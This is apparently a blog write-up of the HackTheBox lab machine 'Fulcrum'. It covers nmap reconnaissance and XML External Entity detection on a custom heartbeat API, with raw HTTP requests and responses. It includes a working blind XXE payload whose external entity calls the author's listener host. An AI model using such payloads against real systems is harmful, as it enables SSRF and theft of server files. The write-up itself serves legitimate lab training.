Fulcrum

IppSec's walkthrough can be found here: https://www.youtube.com/watch?v=46RJxJ-Fm0Y

Tags: XML External Entity, XXE, SSRF

Recon

nmap -sC -sV -p- -oA nmap/initial 10.10.10.62

Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-17 20:53 BST
Nmap scan report for 10.10.10.62
Host is up (0.011s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
4/tcp    open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: nginx/1.18.0 (Ubuntu)
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Input string was not in a correct format.
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: phpMyAdmin
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: nginx/1.18.0 (Ubuntu)
9999/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Input string was not in a correct format.
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: nginx/1.18.0 (Ubuntu)
56423/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (application/json;charset=utf-8).
|_http-server-header: Fulcrum-API Beta
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial XXE Detection

Port 56423 has a custom heartbeat API. The default response of Ping Pong can be modified to Ping Ping by sending a simple XML statement.

Standard Request/Response

GET / HTTP/1.1
Host: 10.10.10.62:56423
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------------

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2022 20:10:37 GMT
Content-Type: application/json;charset=utf-8
Connection: close
Server: Fulcrum-API Beta
Content-Length: 31

{"Heartbeat":{"Ping":"Pong"}}

Modified Request/Response

GET / HTTP/1.1
Host: 10.10.10.62:56423
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Length: 44

<Heartbeat>
<Ping>Ping</Ping>
</Heartbeat>

------------------------------------

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2022 20:16:57 GMT
Content-Type: application/json;charset=utf-8
Connection: keep-alive
Server: Fulcrum-API Beta
Content-Length: 31

{"Heartbeat":{"Ping":"Ping"}}

Blind XXE PoC

This behavior indicates that the site is likely vulnerable to XXE. As a proof of concept we can attempt to request an external document on a remote system under our control by using a Blind XXE Payload. The server response hangs but netcat recieves a request for /notes.

GET / HTTP/1.1
Host: 10.10.10.62:56423
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Length: 173

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://10.10.14.10:9001/notes" >]>
<myhackingblog>&xxe;
</myhackingblog>

XXE Get Files

PreviousMy Hacking Blog NextKali Samba Share

Last updated 3 years ago

hashtagRecon

hashtagInitial XXE Detection

hashtagBlind XXE PoC

hashtagXXE Get Files

Recon

Initial XXE Detection

Blind XXE PoC

XXE Get Files